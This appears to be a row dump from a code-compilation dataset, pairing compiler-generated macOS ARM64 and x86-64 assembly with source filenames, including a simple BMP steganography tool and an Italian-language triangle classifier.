ldur x0, [x29, #-64]
bl _puts
b LBB0_34
LBB0_34:
stur wzr, [x29, #-4]
b LBB0_35
LBB0_35:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Syntax: stegano [e|d] /path/to/image.bmp"
l_.str.1: ; @.str.1
.asciz "rb+"
l_.str.2: ; @.str.2
.asciz "rb"
l_.str.3: ; @.str.3
.asciz "Syntax: stegano [e|d] /path/to/image.bmp\nError opening file %s"
l_.str.4: ; @.str.4
.asciz "Enter the message to write on the image:"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $176, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $3, -8(%rbp)
jge LBB0_2
## %bb.1:
leaq L_.str(%rip), %rdi
callq _puts
movl $1, -4(%rbp)
jmp LBB0_35
LBB0_2:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movb (%rax), %al
movb %al, -17(%rbp)
movsbl -17(%rbp), %eax
cmpl $101, %eax
jne LBB0_4
## %bb.3:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq %rax, -32(%rbp)
jmp LBB0_5
LBB0_4:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.2(%rip), %rsi
callq _fopen
movq %rax, -32(%rbp)
LBB0_5:
cmpq $0, -32(%rbp)
jne LBB0_7
## %bb.6:
movq -16(%rbp), %rax
movq 16(%rax), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movl $2, -4(%rbp)
jmp LBB0_35
LBB0_7:
movq -32(%rbp), %rdi
movl $10, %esi
xorl %edx, %edx
callq _fseek
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, -124(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -124(%rbp), %eax ## 4-byte Reload
shll $8, %ecx
orl %ecx, %eax
movl %eax, -120(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -120(%rbp), %eax ## 4-byte Reload
shll $16, %ecx
orl %ecx, %eax
movl %eax, -116(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -116(%rbp), %eax ## 4-byte Reload
shll $24, %ecx
orl %ecx, %eax
movl %eax, -36(%rbp)
movq -32(%rbp), %rdi
movl $18, %esi
xorl %edx, %edx
callq _fseek
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, -112(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -112(%rbp), %eax ## 4-byte Reload
shll $8, %ecx
orl %ecx, %eax
movl %eax, -108(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -108(%rbp), %eax ## 4-byte Reload
shll $16, %ecx
orl %ecx, %eax
movl %eax, -104(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -104(%rbp), %eax ## 4-byte Reload
shll $24, %ecx
orl %ecx, %eax
movl %eax, -40(%rbp)
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, -100(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -100(%rbp), %eax ## 4-byte Reload
shll $8, %ecx
orl %ecx, %eax
movl %eax, -96(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -96(%rbp), %eax ## 4-byte Reload
shll $16, %ecx
orl %ecx, %eax
movl %eax, -92(%rbp) ## 4-byte Spill
movq -32(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl -92(%rbp), %eax ## 4-byte Reload
shll $24, %ecx
orl %ecx, %eax
movl %eax, -44(%rbp)
imull $3, -40(%rbp), %eax
movl $4, %ecx
cltd
idivl %ecx
movb %dl, %al
movb %al, -45(%rbp)
cmpb $0, %al
je LBB0_9
## %bb.8:
movsbl -45(%rbp), %ecx
movl $4, %eax
subl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
LBB0_9:
movq -32(%rbp), %rdi
movslq -36(%rbp), %rsi
xorl %edx, %edx
callq _fseek
movl -40(%rbp), %eax
imull -44(%rbp), %eax
movl $3, %ecx
cltd
idivl %ecx
movl %eax, -52(%rbp)
movslq -52(%rbp), %rdi
movl $1, %esi
callq _calloc
movq %rax, -64(%rbp)
movsbl -17(%rbp), %eax
cmpl $101, %eax
jne LBB0_11
## %bb.10:
leaq L_.str.4(%rip), %rdi
callq _puts
movq -64(%rbp), %rdi
movl -52(%rbp), %esi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
callq _fgets
LBB0_11:
movq $0, -72(%rbp)
movl $0, -76(%rbp)
LBB0_12: ## =>This Loop Header: Depth=1
## Child Loop BB0_14 Depth 2
## Child Loop BB0_16 Depth 3
movl -76(%rbp), %eax
cmpl -44(%rbp), %eax
jge LBB0_32
## %bb.13: ## in Loop: Header=BB0_12 Depth=1
movl $0, -80(%rbp)
LBB0_14: ## Parent Loop BB0_12 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_16 Depth 3
movl -80(%rbp), %eax
cmpl -40(%rbp), %eax
jge LBB0_30
## %bb.15: ## in Loop: Header=BB0_14 Depth=2
movl $0, -84(%rbp)
LBB0_16: ## Parent Loop BB0_12 Depth=1
## Parent Loop BB0_14 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $3, -84(%rbp)
jge LBB0_28
## %bb.17: ## in Loop: Header=BB0_16 Depth=3
movsbl -17(%rbp), %eax
cmpl $101, %eax
jne LBB0_22
## %bb.18: ## in Loop: Header=BB0_16 Depth=3
movq -32(%rbp), %rdi
callq _fgetc
andl $254, %eax
## kill: def $al killed $al killed $eax
movb %al, -85(%rbp)
movq -64(%rbp), %rax
movq %rax, -152(%rbp) ## 8-byte Spill
movq -72(%rbp), %rax
movl $9, %ecx
cqto
idivq %rcx
movq %rax, %rcx
movq -152(%rbp), %rax ## 8-byte Reload
movsbl (%rax,%rcx), %eax
movl %eax, -140(%rbp) ## 4-byte Spill
movq -72(%rbp), %rax
movl $8, %ecx
cqto
idivq %rcx
movl -140(%rbp), %eax ## 4-byte Reload
movl %edx, %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -86(%rbp)
movq -32(%rbp), %rdi
movq $-1, %rsi
movl $1, %edx
callq _fseek
movsbl -85(%rbp), %edi
movsbl -86(%rbp), %eax
orl %eax, %edi
movq -32(%rbp), %rsi
callq _fputc
movq -64(%rbp), %rax
movq %rax, -136(%rbp) ## 8-byte Spill
movq -72(%rbp), %rax
movl $9, %ecx
cqto
idivq %rcx
movq %rax, %rcx
movq -136(%rbp), %rax ## 8-byte Reload
subq $1, %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
jne LBB0_21
## %bb.19: ## in Loop: Header=BB0_16 Depth=3
cmpq $9, -72(%rbp)
jle LBB0_21
## %bb.20: ## in Loop: Header=BB0_14 Depth=2
jmp LBB0_28
LBB0_21: ## in Loop: Header=BB0_16 Depth=3
jmp LBB0_26
LBB0_22: ## in Loop: Header=BB0_16 Depth=3
movq -32(%rbp), %rdi
callq _fgetc
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -87(%rbp)
movsbl -87(%rbp), %esi
movq -72(%rbp), %rax
movl $8, %ecx
cqto
idivq %rcx
movl %edx, %ecx
## kill: def $cl killed $ecx
shll %cl, %esi
movq -64(%rbp), %rax
movq %rax, -168(%rbp) ## 8-byte Spill
movq -72(%rbp), %rax
movl $9, %ecx
cqto
idivq %rcx
movq %rax, %rcx
movq -168(%rbp), %rax ## 8-byte Reload
movsbl (%rax,%rcx), %edx
orl %esi, %edx
## kill: def $dl killed $dl killed $edx
movb %dl, (%rax,%rcx)
movq -64(%rbp), %rax
movq %rax, -160(%rbp) ## 8-byte Spill
movq -72(%rbp), %rax
movl $9, %ecx
cqto
idivq %rcx
movq %rax, %rcx
movq -160(%rbp), %rax ## 8-byte Reload
subq $1, %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
jne LBB0_25
## %bb.23: ## in Loop: Header=BB0_16 Depth=3
cmpq $9, -72(%rbp)
jle LBB0_25
## %bb.24: ## in Loop: Header=BB0_14 Depth=2
jmp LBB0_28
LBB0_25: ## in Loop: Header=BB0_16 Depth=3
jmp LBB0_26
LBB0_26: ## in Loop: Header=BB0_16 Depth=3
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
## %bb.27: ## in Loop: Header=BB0_16 Depth=3
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
jmp LBB0_16
LBB0_28: ## in Loop: Header=BB0_14 Depth=2
jmp LBB0_29
LBB0_29: ## in Loop: Header=BB0_14 Depth=2
movl -80(%rbp), %eax
addl $1, %eax
movl %eax, -80(%rbp)
jmp LBB0_14
LBB0_30: ## in Loop: Header=BB0_12 Depth=1
movq -32(%rbp), %rdi
movsbq -45(%rbp), %rsi
movl $1, %edx
callq _fseek
## %bb.31: ## in Loop: Header=BB0_12 Depth=1
movl -76(%rbp), %eax
addl $1, %eax
movl %eax, -76(%rbp)
jmp LBB0_12
LBB0_32:
movq -32(%rbp), %rdi
callq _fclose
movsbl -17(%rbp), %eax
cmpl $100, %eax
jne LBB0_34
## %bb.33:
movq -64(%rbp), %rdi
callq _puts
LBB0_34:
movl $0, -4(%rbp)
LBB0_35:
movl -4(%rbp), %eax
addq $176, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Syntax: stegano [e|d] /path/to/image.bmp"
L_.str.1: ## @.str.1
.asciz "rb+"
L_.str.2: ## @.str.2
.asciz "rb"
L_.str.3: ## @.str.3
.asciz "Syntax: stegano [e|d] /path/to/image.bmp\nError opening file %s"
L_.str.4: ## @.str.4
.asciz "Enter the message to write on the image:"
.subsections_via_symbols
| the_stack_data/84385.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
sub x8, x29, #16
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur s0, [x29, #-8]
ldur s1, [x29, #-12]
fcmp s0, s1
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
ldur s0, [x29, #-8]
ldur s1, [x29, #-16]
fcmp s0, s1
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_9
LBB0_3:
ldur s0, [x29, #-8]
ldur s1, [x29, #-12]
fcmp s0, s1
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4:
ldur s0, [x29, #-8]
ldur s1, [x29, #-16]
fcmp s0, s1
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldur s0, [x29, #-12]
ldur s1, [x29, #-16]
fcmp s0, s1
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_8
LBB0_7:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_8
LBB0_8:
b LBB0_9
LBB0_9:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Inserisci tre numeri separati da spazi: "
l_.str.1: ; @.str.1
.asciz "%f %f %f"
l_.str.2: ; @.str.2
.asciz "Il triangolo \303\250 equilatero\n"
l_.str.3: ; @.str.3
.asciz "Il triangolo \303\250 isoscele\n"
l_.str.4: ; @.str.4
.asciz "Il triangolo \303\250 scaleno\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
leaq -16(%rbp), %rcx
movb $0, %al
callq _scanf
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -12(%rbp), %xmm0
jne LBB0_3
jp LBB0_3
## %bb.1:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -16(%rbp), %xmm0
jne LBB0_3
jp LBB0_3
## %bb.2:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_9
LBB0_3:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -12(%rbp), %xmm0
jne LBB0_4
jp LBB0_4
jmp LBB0_6
LBB0_4:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -16(%rbp), %xmm0
jne LBB0_5
jp LBB0_5
jmp LBB0_6
LBB0_5:
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -16(%rbp), %xmm0
jne LBB0_7
jp LBB0_7
LBB0_6:
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_8
LBB0_7:
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
LBB0_8:
jmp LBB0_9
LBB0_9:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Inserisci tre numeri separati da spazi: "
L_.str.1: ## @.str.1
.asciz "%f %f %f"
L_.str.2: ## @.str.2
.asciz "Il triangolo \303\250 equilatero\n"
L_.str.3: ## @.str.3
.asciz "Il triangolo \303\250 isoscele\n"
L_.str.4: ## @.str.4
.asciz "Il triangolo \303\250 scaleno\n"
.subsections_via_symbols
| the_stack_data/148576688.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/45449192.c |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.